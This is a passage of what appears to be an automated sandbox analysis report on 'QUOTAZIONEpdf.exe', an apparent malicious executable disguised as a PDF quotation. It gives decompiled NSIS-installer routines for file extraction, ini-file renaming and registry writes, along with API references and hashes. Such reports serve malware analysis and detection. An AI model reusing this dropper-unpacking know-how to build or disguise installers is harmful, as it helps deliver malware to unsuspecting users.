                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                • String ID: @.B$N$open
                • API String ID: 3615053054-3815657624
                • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                				struct tagLOGBRUSH _v16;
                				struct tagRECT _v32;
                				struct tagPAINTSTRUCT _v96;
                				struct HDC__* _t70;
                				struct HBRUSH__* _t87;
                				struct HFONT__* _t94;
                				long _t102;
                				signed int _t126;
                				struct HDC__* _t128;
                				intOrPtr _t130;
                
                				if(_a8 == 0xf) {
                					_t130 =  *0x423eb0;
                					_t70 = BeginPaint(_a4,  &_v96);
                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                					_a8 = _t70;
                					GetClientRect(_a4,  &_v32);
                					_t126 = _v32.bottom;
                					_v32.bottom = _v32.bottom & 0x00000000;
                					while(_v32.top < _t126) {
                						_a12 = _t126 - _v32.top;
                						asm("cdq");
                						asm("cdq");
                						asm("cdq");
                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                						_t87 = CreateBrushIndirect( &_v16);
                						_v32.bottom = _v32.bottom + 4;
                						_a16 = _t87;
                						FillRect(_a8,  &_v32, _t87);
                						DeleteObject(_a16);
                						_v32.top = _v32.top + 4;
                					}
                					if( *(_t130 + 0x58) != 0xffffffff) {
                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                						_a16 = _t94;
                						if(_t94 != 0) {
                							_t128 = _a8;
                							_v32.left = 0x10;
                							_v32.top = 8;
                							SetBkMode(_t128, 1);
                							SetTextColor(_t128,  *(_t130 + 0x58));
                							_a8 = SelectObject(_t128, _a16);
                							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
                							SelectObject(_t128, _a8);
                							DeleteObject(_a16);
                						}
                					}
                					EndPaint(_a4,  &_v96);
                					return 0;
                				}
                				_t102 = _a16;
                				if(_a8 == 0x46) {
                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
                				}
                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                			}

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F
                • API String ID: 941294808-1304234792
                • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E004057D3() {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t15;
                				long _t16;
                				int _t20;
                				void* _t28;
                				long _t29;
                				intOrPtr* _t37;
                				int _t43;
                				void* _t44;
                				long _t47;
                				CHAR* _t49;
                				void* _t51;
                				void* _t53;
                				intOrPtr* _t54;
                				void* _t55;
                				void* _t56;
                
                				_t15 = E00405DA3(1);
                				_t49 =  *(_t55 + 0x18);
                				if(_t15 != 0) {
                					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                					if(_t20 != 0) {
                						L16:
                						 *0x423f30 =  *0x423f30 + 1;
                						return _t20;
                					}
                				}
                				 *0x422628 = 0x4c554e;
                				if(_t49 == 0) {
                					L5:
                					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                					if(_t16 != 0 && _t16 <= 0x400) {
                						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                						_t56 = _t55 + 0x10;
                						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
                						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                						_t53 = _t20;
                						 *(_t56 + 0x14) = _t53;
                						if(_t53 == 0xffffffff) {
                							goto L16;
                						}
                						_t47 = GetFileSize(_t53, 0);
                						_t7 = _t43 + 0xa; // 0xa
                						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                							L15:
                							_t20 = CloseHandle(_t53);
                							goto L16;
                						} else {
                							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                								if(_t28 == 0) {
                									L13:
                									_t29 = _t47;
                									L14:
                									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                									SetFilePointer(_t53, 0, 0, 0);
                									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                									GlobalFree(_t51);
                									goto L15;
                								}
                								_t37 = _t28 + 1;
                								_t44 = _t51 + _t47;
                								_t54 = _t37;
                								if(_t37 >= _t44) {
                									L21:
                									_t53 =  *(_t56 + 0x14);
                									_t29 = _t37 - _t51;
                									goto L14;
                								} else {
                									goto L20;
                								}
                								do {
                									L20:
                									 *((char*)(_t43 + _t54)) =  *_t54;
                									_t54 = _t54 + 1;
                								} while (_t54 < _t44);
                								goto L21;
                							}
                							E00405A85(_t51 + _t47, "[Rename]\r\n");
                							_t47 = _t47 + 0xa;
                							goto L13;
                						}
                					}
                				} else {
                					CloseHandle(E0040575C(_t49, 0, 1));
                					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                					if(_t16 != 0 && _t16 <= 0x400) {
                						goto L5;
                					}
                				}
                				return _t16;
                			}

                APIs
                  • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                • GetShortPathNameA.KERNEL32 ref: 00405829
                • GetShortPathNameA.KERNEL32 ref: 00405846
                • wsprintfA.USER32 ref: 00405864
                • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                • GlobalFree.KERNEL32 ref: 00405923
                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                  • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                  • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                • String ID: %s=%s$(&B$[Rename]
                • API String ID: 3772915668-1834469719
                • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405CE3(CHAR* _a4) {
                				char _t5;
                				char _t7;
                				char* _t15;
                				char* _t16;
                				CHAR* _t17;
                
                				_t17 = _a4;
                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                					_t17 =  &(_t17[4]);
                				}
                				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                					_t17 =  &(_t17[2]);
                				}
                				_t5 =  *_t17;
                				_t15 = _t17;
                				_t16 = _t17;
                				if(_t5 != 0) {
                					do {
                						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                							_t16 = CharNextA(_t16);
                						}
                						_t17 = CharNextA(_t17);
                						_t5 =  *_t17;
                					} while (_t5 != 0);
                				}
                				 *_t16 =  *_t16 & 0x00000000;
                				while(1) {
                					_t16 = CharPrevA(_t15, _t16);
                					_t7 =  *_t16;
                					if(_t7 != 0x20 && _t7 != 0x5c) {
                						break;
                					}
                					 *_t16 =  *_t16 & 0x00000000;
                					if(_t15 < _t16) {
                						continue;
                					}
                					break;
                				}
                				return _t7;
                			}

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-2918476198
                • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                				struct tagLOGBRUSH _v16;
                				long _t35;
                				long _t37;
                				void* _t40;
                				long* _t49;
                
                				if(_a4 + 0xfffffecd > 5) {
                					L15:
                					return 0;
                				}
                				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                				if(_t49 == 0) {
                					goto L15;
                				}
                				_t35 =  *_t49;
                				if((_t49[5] & 0x00000002) != 0) {
                					_t35 = GetSysColor(_t35);
                				}
                				if((_t49[5] & 0x00000001) != 0) {
                					SetTextColor(_a8, _t35);
                				}
                				SetBkMode(_a8, _t49[4]);
                				_t37 = _t49[1];
                				_v16.lbColor = _t37;
                				if((_t49[5] & 0x00000008) != 0) {
                					_t37 = GetSysColor(_t37);
                					_v16.lbColor = _t37;
                				}
                				if((_t49[5] & 0x00000004) != 0) {
                					SetBkColor(_a8, _t37);
                				}
                				if((_t49[5] & 0x00000010) != 0) {
                					_v16.lbStyle = _t49[2];
                					_t40 = _t49[3];
                					if(_t40 != 0) {
                						DeleteObject(_t40);
                					}
                					_t49[3] = CreateBrushIndirect( &_v16);
                				}
                				return _t49[3];
                			}









                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0040266E(struct _OVERLAPPED* __ebx) {
                				void* _t27;
                				long _t32;
                				struct _OVERLAPPED* _t47;
                				void* _t51;
                				void* _t53;
                				void* _t56;
                				void* _t57;
                				void* _t58;
                
                				_t47 = __ebx;
                				 *(_t58 - 8) = 0xfffffd66;
                				_t52 = E004029E8(0xfffffff0);
                				 *(_t58 - 0x44) = _t24;
                				if(E004055E5(_t52) == 0) {
                					E004029E8(0xffffffed);
                				}
                				E0040573D(_t52);
                				_t27 = E0040575C(_t52, 0x40000000, 2);
                				 *(_t58 + 8) = _t27;
                				if(_t27 != 0xffffffff) {
                					_t32 =  *0x423eb4;
                					 *(_t58 - 0x2c) = _t32;
                					_t51 = GlobalAlloc(0x40, _t32);
                					if(_t51 != _t47) {
                						E004031DA(_t47);
                						E004031A8(_t51,  *(_t58 - 0x2c));
                						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                						 *(_t58 - 0x30) = _t56;
                						if(_t56 != _t47) {
                							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                							while( *_t56 != _t47) {
                								_t49 =  *_t56;
                								_t57 = _t56 + 8;
                								 *(_t58 - 0x38) =  *_t56;
                								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                								_t56 = _t57 +  *(_t58 - 0x38);
                							}
                							GlobalFree( *(_t58 - 0x30));
                						}
                						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                						GlobalFree(_t51);
                						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                					}
                					CloseHandle( *(_t58 + 8));
                				}
                				_t53 = 0xfffffff3;
                				if( *(_t58 - 8) < _t47) {
                					_t53 = 0xffffffef;
                					DeleteFileA( *(_t58 - 0x44));
                					 *((intOrPtr*)(_t58 - 4)) = 1;
                				}
                				_push(_t53);
                				E00401423();
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                				return 0;
                			}












                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                • GlobalFree.KERNEL32 ref: 00402717
                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                • GlobalFree.KERNEL32 ref: 00402730
                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                • String ID:
                • API String ID: 3294113728-0
                • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404E23(CHAR* _a4, CHAR* _a8) {
                				struct HWND__* _v8;
                				signed int _v12;
                				CHAR* _v32;
                				long _v44;
                				int _v48;
                				void* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				CHAR* _t26;
                				signed int _t27;
                				CHAR* _t28;
                				long _t29;
                				signed int _t39;
                
                				_t26 =  *0x423684;
                				_v8 = _t26;
                				if(_t26 != 0) {
                					_t27 =  *0x423f54;
                					_v12 = _t27;
                					_t39 = _t27 & 0x00000001;
                					if(_t39 == 0) {
                						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                					}
                					_t26 = lstrlenA(0x41fc70);
                					_a4 = _t26;
                					if(_a8 == 0) {
                						L6:
                						if((_v12 & 0x00000004) == 0) {
                							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                						}
                						if((_v12 & 0x00000002) == 0) {
                							_v32 = 0x41fc70;
                							_v52 = 1;
                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                							_v44 = 0;
                							_v48 = _t29 - _t39;
                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                						}
                						if(_t39 != 0) {
                							_t28 = _a4;
                							 *((char*)(_t28 + 0x41fc70)) = 0;
                							return _t28;
                						}
                					} else {
                						_t26 =  &(_a4[lstrlenA(_a8)]);
                						if(_t26 < 0x800) {
                							_t26 = lstrcatA(0x41fc70, _a8);
                							goto L6;
                						}
                					}
                				}
                				return _t26;
                			}


















                APIs
                • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                				long _v8;
                				signed char _v12;
                				unsigned int _v16;
                				void* _v20;
                				intOrPtr _v24;
                				long _v56;
                				void* _v60;
                				long _t15;
                				unsigned int _t19;
                				signed int _t25;
                				struct HWND__* _t28;
                
                				_t28 = _a4;
                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                				if(_a8 == 0) {
                					L4:
                					_v56 = _t15;
                					_v60 = 4;
                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                					return _v24;
                				}
                				_t19 = GetMessagePos();
                				_v16 = _t19 >> 0x10;
                				_v20 = _t19;
                				ScreenToClient(_t28,  &_v20);
                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                				if((_v12 & 0x00000066) != 0) {
                					_t15 = _v8;
                					goto L4;
                				}
                				return _t25 | 0xffffffff;
                			}















                APIs
                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                • GetMessagePos.USER32 ref: 00404715
                • ScreenToClient.USER32 ref: 0040472F
                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                				char _v68;
                				void* _t11;
                				CHAR* _t19;
                
                				if(_a8 == 0x110) {
                					SetTimer(_a4, 1, 0xfa, 0);
                					_a8 = 0x113;
                				}
                				if(_a8 == 0x113) {
                					_t11 = E00402BA9();
                					_t19 = "unpacking data: %d%%";
                					if( *0x423eb0 == 0) {
                						_t19 = "verifying installer: %d%%";
                					}
                					wsprintfA( &_v68, _t19, _t11);
                					SetWindowTextA(_a4,  &_v68);
                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                				}
                				return 0;
                			}







                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: unpacking data: %d%%$verifying installer: %d%%
                • API String ID: 1451636040-1158693248
                • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E004022F5(void* __eax) {
                				void* _t15;
                				char* _t18;
                				int _t19;
                				char _t24;
                				int _t27;
                				intOrPtr _t35;
                				void* _t37;
                
                				_t15 = E00402ADD(__eax);
                				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                				 *(_t37 - 0x44) = E004029E8(2);
                				_t18 = E004029E8(0x11);
                				_t31 =  *0x423f50 | 0x00000002;
                				 *(_t37 - 4) = 1;
                				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
                				if(_t19 == 0) {
                					if(_t35 == 1) {
                						E004029E8(0x23);
                						_t19 = lstrlenA(0x40a368) + 1;
                					}
                					if(_t35 == 4) {
                						_t24 = E004029CB(3);
                						 *0x40a368 = _t24;
                						_t19 = _t35;
                					}
                					if(_t35 == 3) {
                						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                					}
                					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                						 *(_t37 - 4) = _t27;
                					}
                					_push( *(_t37 + 8));
                					RegCloseKey();
                				}
                				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                				return 0;
                			}











                APIs
                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
